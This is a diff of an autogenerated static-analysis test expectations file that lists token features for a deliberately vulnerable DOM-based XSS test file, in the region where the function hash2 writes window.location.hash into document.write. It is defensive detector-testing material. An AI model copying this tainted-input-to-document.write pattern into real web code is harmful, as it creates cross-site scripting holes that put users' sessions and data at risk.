URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:415:10:415:14 | hash2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:415:10:415:14 | hash2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:13 | payload | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:13 | payload | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:13 | payload | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:13 | payload | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:13 | payload | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:46 | payload | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:46 | payload | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:46 | payload | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:46 | payload | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:46 | payload | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:46 | payload ... bstr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:46 | payload ... bstr(1) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:46 | payload ... bstr(1) | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:46 | payload ... bstr(1) | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:416:7:416:46 | payload ... bstr(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:22 | window | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:22 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:22 | window | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:22 | window | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:22 | window | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:31 | window.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:31 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:31 | window.location | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:31 | window.location | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:31 | window.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:36 | window.location.hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:36 | window.location.hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:36 | window.location.hash | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:36 | window.location.hash | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:36 | window.location.hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:43 | window. ... .substr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:43 | window. ... .substr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:43 | window. ... .substr | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:43 | window. ... .substr | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:43 | window. ... .substr | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:46 | exceptional return of window. ... bstr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:46 | exceptional return of window. ... bstr(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:46 | exceptional return of window. ... bstr(1) | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:46 | exceptional return of window. ... bstr(1) | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:46 | exceptional return of window. ... bstr(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:46 | window. ... bstr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:46 | window. ... bstr(1) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:46 | window. ... bstr(1) | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:46 | window. ... bstr(1) | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:416:17:416:46 | window. ... bstr(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:416:24:416:31 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:416:24:416:31 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:416:24:416:31 | location | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:416:24:416:31 | location | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:416:24:416:31 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:416:33:416:36 | hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:416:33:416:36 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:416:33:416:36 | hash | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:416:33:416:36 | hash | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:416:33:416:36 | hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:416:38:416:43 | substr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:416:38:416:43 | substr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:416:38:416:43 | substr | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:416:38:416:43 | substr | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:416:38:416:43 | substr | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:416:45:416:45 | 1 | CalleeFlexibleAccessPath | window.location.hash.substr | | autogenerated/Xss/DomBasedXss/tst.js:416:45:416:45 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:416:45:416:45 | 1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17527,6 +121935,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:416:45:416:45 | 1 | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | | autogenerated/Xss/DomBasedXss/tst.js:416:45:416:45 | 1 | enclosingFunctionName | hash2 | | autogenerated/Xss/DomBasedXss/tst.js:416:45:416:45 | 1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:10 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:10 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:10 | document | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:10 | document | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:10 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:16 | document.write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:16 | document.write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:16 | document.write | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:16 | document.write | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:16 | document.write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:25 | documen ... ayload) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:25 | documen ... ayload) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:25 | documen ... ayload) | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:25 | documen ... ayload) | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:25 | documen ... ayload) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:25 | exceptional return of documen ... ayload) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:25 | exceptional return of documen ... ayload) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:25 | exceptional return of documen ... ayload) | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:25 | exceptional return of documen ... ayload) | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:417:3:417:25 | exceptional return of documen ... ayload) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:417:12:417:16 | write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:417:12:417:16 | write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:417:12:417:16 | write | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:417:12:417:16 | write | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:417:12:417:16 | write | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:417:18:417:24 | payload | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/tst.js:417:18:417:24 | payload | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:417:18:417:24 | payload | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17535,6 +121968,66 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:417:18:417:24 | payload | enclosingFunctionName | hash2 | | autogenerated/Xss/DomBasedXss/tst.js:417:18:417:24 | payload | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:417:18:417:24 | payload | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:11 | match | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:11 | match | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:11 | match | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:11 | match | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:11 | match | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:55 | match | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:55 | match | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:55 | match | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:55 | match | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:55 | match | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:419:7:419:55 | match = ... (\\w+)/) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 